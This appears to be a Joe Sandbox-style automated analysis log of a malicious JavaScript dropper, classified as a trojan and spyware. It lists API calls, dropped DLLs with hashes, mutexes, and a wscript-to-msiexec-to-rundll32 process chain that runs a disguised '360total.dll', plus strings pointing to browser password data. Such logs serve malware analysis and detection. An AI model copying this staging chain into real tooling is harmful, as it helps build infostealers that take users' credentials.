Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7B40 NtFreeVirtualMemory, 5_2_00000235B5CE7B40
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7A54 NtWriteFile, 5_2_00000235B5CE7A54
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE79C8 NtClose, 5_2_00000235B5CE79C8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7588 RtlInitUnicodeString,NtCreateFile,NtClose, 5_2_00000235B5CE7588
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE378C NtClose, 5_2_00000235B5CE378C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 5_2_00000235B5CE463C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7ACC NtClose, 5_2_00000235B5CE7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE745C RtlInitUnicodeString,NtOpenFile,NtClose, 5_2_00000235B5CE745C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7704 NtQueryInformationFile, 5_2_00000235B5CE7704
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7694 RtlInitUnicodeString,NtDeleteFile, 5_2_00000235B5CE7694
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CECB54 NtDelayExecution, 5_2_00000235B5CECB54
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CF0AF0 NtWriteFile, 5_2_00000235B5CF0AF0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031241C NtAllocateVirtualMemory, 6_3_000001801031241C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031248C NtFreeVirtualMemory, 6_3_000001801031248C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BAD34 NtAllocateVirtualMemory, 7_2_000001EF532BAD34
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7B40 NtFreeVirtualMemory, 7_2_000001EF532B7B40
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle, 7_2_000001EF532B463C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7588 RtlInitUnicodeString,NtCreateFile,NtClose, 7_2_000001EF532B7588
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B378C NtClose, 7_2_000001EF532B378C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B745C RtlInitUnicodeString,NtOpenFile,NtClose, 7_2_000001EF532B745C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BCB54 NtDelayExecution, 7_2_000001EF532BCB54
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7A54 NtWriteFile, 7_2_000001EF532B7A54
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B77B0 RtlInitUnicodeString,NtCreateFile, 7_2_000001EF532B77B0
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B79C8 NtClose, 7_2_000001EF532B79C8
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7ACC NtClose, 7_2_000001EF532B7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B78C0 NtReadFile, 7_2_000001EF532B78C0
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BB0C4 NtOpenKey, 7_2_000001EF532BB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7694 RtlInitUnicodeString,NtDeleteFile, 7_2_000001EF532B7694
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7704 NtQueryInformationFile, 7_2_000001EF532B7704
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 7_2_000001EF532BB1D4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006A2C8: DeviceIoControl, 5_2_000000018006A2C8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 5_2_000000018004B1A4
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI846B.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFFD6.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI54.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA3.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC4.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI103.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI181.tmp
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIFFD6.tmp
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00586A50 3_2_00586A50
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005BF032 3_2_005BF032
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005AE270 3_2_005AE270
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005AC2CA 3_2_005AC2CA
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B92A9 3_2_005B92A9
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B84BD 3_2_005B84BD
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005AA587 3_2_005AA587
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_0058C870 3_2_0058C870
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005AA915 3_2_005AA915
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A4920 3_2_005A4920
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B0A48 3_2_005B0A48
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00589CC0 3_2_00589CC0
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B5D6D 3_2_005B5D6D
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180017FE8 5_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006DFF4 5_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800220D8 5_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018007C140 5_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180060174 5_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018008023C 5_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018000834C 5_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006C470 5_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800784E0 5_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800764F0 5_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180060578 5_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180010580 5_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004E5DC 5_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180062600 5_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002610 5_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180004638 5_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004A650 5_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006E760 5_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800647B0 5_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018007E7C7 5_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180076930 5_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180062954 5_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006A994 5_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006E9FC 5_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180082A18 5_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180072A27 5_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180010B58 5_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180026C84 5_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018001ECF4 5_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180008E20 5_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180052FD8 5_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018003AFE8 5_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005D014 5_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006F0B4 5_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800630CC 5_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005912C 5_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004B1A4 5_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049278 5_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018007B2D0 5_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018002B2EC 5_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006D3D4 5_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800033E0 5_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180075480 5_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800694A0 5_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005958C 5_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800576DC 5_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800097E0 5_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800277FC 5_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018002D964 5_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180073B60 5_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018007BBB0 5_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018001BC38 5_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005DD18 5_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180073DF0 5_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180011DF0 5_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005BE6C 5_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004FF88 5_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE1030 5_2_00000235B5CE1030
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031453C 6_3_000001801031453C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010314B50 6_3_0000018010314B50
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801032D19C 6_3_000001801032D19C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801036318C 6_3_000001801036318C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103551F8 6_3_00000180103551F8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103401FB 6_3_00000180103401FB
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103451C0 6_3_00000180103451C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103711CC 6_3_00000180103711CC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031E31C 6_3_000001801031E31C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801039B370 6_3_000001801039B370
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010316358 6_3_0000018010316358
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103873A0 6_3_00000180103873A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103583EC 6_3_00000180103583EC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010382430 6_3_0000018010382430
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801036E45C 6_3_000001801036E45C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010367448 6_3_0000018010367448
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010373498 6_3_0000018010373498
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103994F0 6_3_00000180103994F0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103784D8 6_3_00000180103784D8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801035F4C4 6_3_000001801035F4C4
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010385534 6_3_0000018010385534
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010318568 6_3_0000018010318568
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010330540 6_3_0000018010330540
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103405A0 6_3_00000180103405A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103705FC 6_3_00000180103705FC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801033F5FB 6_3_000001801033F5FB
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801035B5D0 6_3_000001801035B5D0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801039D63C 6_3_000001801039D63C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010339650 6_3_0000018010339650
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801038672C 6_3_000001801038672C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103A9708 6_3_00000180103A9708
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010335768 6_3_0000018010335768
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103277E0 6_3_00000180103277E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801034D834 6_3_000001801034D834
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010348824 6_3_0000018010348824
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010377874 6_3_0000018010377874
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801039D8B8 6_3_000001801039D8B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103898B0 6_3_00000180103898B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103A4940 6_3_00000180103A4940
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010388980 6_3_0000018010388980
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031D9E4 6_3_000001801031D9E4
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801035EA84 6_3_000001801035EA84
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010340A8A 6_3_0000018010340A8A
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010392B38 6_3_0000018010392B38
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801039DB34 6_3_000001801039DB34
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010380B54 6_3_0000018010380B54
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103AEBB8 6_3_00000180103AEBB8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801035BB94 6_3_000001801035BB94
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010377C14 6_3_0000018010377C14
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801033FC72 6_3_000001801033FC72
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010319CBC 6_3_0000018010319CBC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010340D18 6_3_0000018010340D18
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010385D68 6_3_0000018010385D68
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010339D94 6_3_0000018010339D94
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103A9D94 6_3_00000180103A9D94
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010368DF8 6_3_0000018010368DF8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801032FE38 6_3_000001801032FE38
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031BEB8 6_3_000001801031BEB8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103AAE84 6_3_00000180103AAE84
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010367EE8 6_3_0000018010367EE8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103A0EC0 6_3_00000180103A0EC0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010371ECC 6_3_0000018010371ECC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801038AF20 6_3_000001801038AF20
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010359F68 6_3_0000018010359F68
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010317FD0 6_3_0000018010317FD0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010336038 6_3_0000018010336038
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801036F018 6_3_000001801036F018
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801034E074 6_3_000001801034E074
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010316078 6_3_0000018010316078
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801037A048 6_3_000001801037A048
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103570C0 6_3_00000180103570C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010384134 6_3_0000018010384134
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010370114 6_3_0000018010370114
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010380154 6_3_0000018010380154
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B1030 7_2_000001EF532B1030
Source: Joe Sandbox View Dropped File: :wtfbbq (copy) 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\sharepoint\360total.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View Dropped File: C:\Windows\Installer\MSI181.tmp 1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\Installer\MSI181.tmp Code function: String function: 005A325F appears 103 times
Source: C:\Windows\Installer\MSI181.tmp Code function: String function: 005A3790 appears 39 times
Source: C:\Windows\Installer\MSI181.tmp Code function: String function: 005A3292 appears 66 times
Source: Document_a51_19i793302-14b09981a5569-3684u8.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winJS@93/27@13/11
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess, 5_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 5_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 5_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 5_2_000000018008395A
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00583860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 3_2_00583860
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00584BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 3_2_00584BA0
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005845B0 LoadResource,LockResource,SizeofResource, 3_2_005845B0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 5_2_0000000180049AEC
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3588:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8500:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8592:120:WilError_03
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF41638D872A10A065.TMP
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Installer\MSI181.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Installer\MSI181.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: rundll32.exe, rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, 00000006.00000003.2934807774.00000180103B5000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2933161054.00000180103B5000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
Source: rundll32.exe, 00000006.00000003.2934807774.00000180103B5000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2933161054.00000180103B5000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: rundll32.exe, 00000006.00000003.2936562885.000001800FF54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Document_a51_19i793302-14b09981a5569-3684u8.js ReversingLabs: Detection: 18%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B0AF98778AC35F634802E620BDCA3C21
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI181.tmp "C:\Windows\Installer\MSI181.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI181.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
